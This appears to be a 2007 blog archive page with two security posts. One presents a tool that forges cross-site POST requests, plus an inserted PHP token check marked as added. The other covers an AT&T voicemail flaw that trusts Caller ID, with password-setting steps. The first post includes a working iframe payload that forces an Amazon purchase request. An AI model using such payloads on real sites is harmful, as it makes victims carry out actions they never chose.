About the Author

Chris Shiflett

Hi, I'm Chris, a web developer and a founding member of Analog. I live and work in Brooklyn, NY.


All Posts for Jul 2007

CSRF Redirector

Inspired by the XSS POST Forwarder, I just created the CSRF Redirector. It's a simple tool that makes it easy to test CSRF using POST, hopefully demonstrating how prevalent CSRF vulnerabilities are as well as reducing the misconception that forging a POST request is complicated.

To use it, construct a URL of the form http://shiflett.org/csrf.php?csrf=URL&NAME=VALUE, where URL is the (URL-encoded) target site, and NAME and VALUE represent a name-value pair, of which there can be zero or more.

For example, the following IFrame exploits the Amazon vulnerability:

<iframe src="http://shiflett.org/csrf.php?csrf=http%3A%2F%2Famazon.com%2Fgp%2Fproduct%2Fhandle-buy-box&ASIN=059600656X&offerListingID=XYPvvbir%2FyHMyphE%2Fy0hKK%2BNt%2FB7%2FlRTFpIRPQG28BSrQ98hAsPyhlIn75S3jksXb3bdE%2FfgEoOZN0Wyy5qYrwEFzXBuOgqf" />

I may add more features at some point. Until then, enjoy!
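The redirector shows that the request method is no obstacle: a third-party page can send any name-value pairs by POST. What it cannot supply is a secret tied to the victim's session. The following is an added example, not part of the original post or the tool's code, of a server-side check built on that fact; the function names, the `csrf_token` field name and the sample values are assumptions, and the session is a plain array so the script runs from the command line.

```php
<?php
declare(strict_types=1);

// Added example. Function names, the 'csrf_token' field name and all sample
// values are assumptions; $session stands in for $_SESSION so this runs on the CLI.

/** Return the session's token, creating it on first use. Embed it in every form. */
function issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32)); // 256 bits, unguessable
    }
    return $session['csrf_token'];
}

/** True when a state-changing request should be accepted. */
function request_is_genuine(string $method, array $post, array $session): bool
{
    if ($method !== 'POST') {
        return false; // never change state on GET
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // A field sent as csrf_token[]=x arrives as an array; reject rather than compare.
    if ($expected === '' || !is_string($supplied)) {
        return false;
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

$session = [];
$token = issue_token($session);

// Constructed requests: the site's own form, and three cross-site attempts that
// can choose every field but cannot read the victim's token.
$cases = [
    'own form'             => ['item' => 'SAMPLE-1', 'csrf_token' => $token],
    'no token'             => ['item' => 'SAMPLE-1'],
    'guessed token'        => ['item' => 'SAMPLE-1', 'csrf_token' => str_repeat('0', 64)],
    'array instead of str' => ['item' => 'SAMPLE-1', 'csrf_token' => ['x']],
];
foreach ($cases as $label => $post) {
    $verdict = request_is_genuine('POST', $post, $session) ? 'accept' : 'reject';
    printf("%-22s %s\n", $label, $verdict);
}
```

In a real handler, pass `$_SERVER['REQUEST_METHOD']`, `$_POST` and `$_SESSION` to these functions after `session_start()`.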

iPhone Security Concern

Nitesh Dhanjani just posted a reminder of an AT&T/Cingular vulnerability he first mentioned over a year ago. If you've recently purchased an iPhone, here's the scary part:

The AT&T/Cingular voicemail system is configured by default not to ask for a password when you check your voicemail from the handset. Unfortunately, the AT&T/Cingular voicemail system trusts Caller ID to determine if the handset is calling it.

I'm not going to claim that Caller ID spoofing is easy, but Paris Hilton can do it. I'm just saying.

Until this vulnerability is fixed, Nitesh recommends setting your voicemail password:

  1. Call your AT&T/Cingular voicemail (dial your own number from the iPhone).
  2. Press 4 to go to Personal Options.
  3. Press 2 to go to Administrative Options.
  4. Press 1 to go to Password.
  5. Press 2 to turn your password On.

Thanks for the reminder, Nitesh!
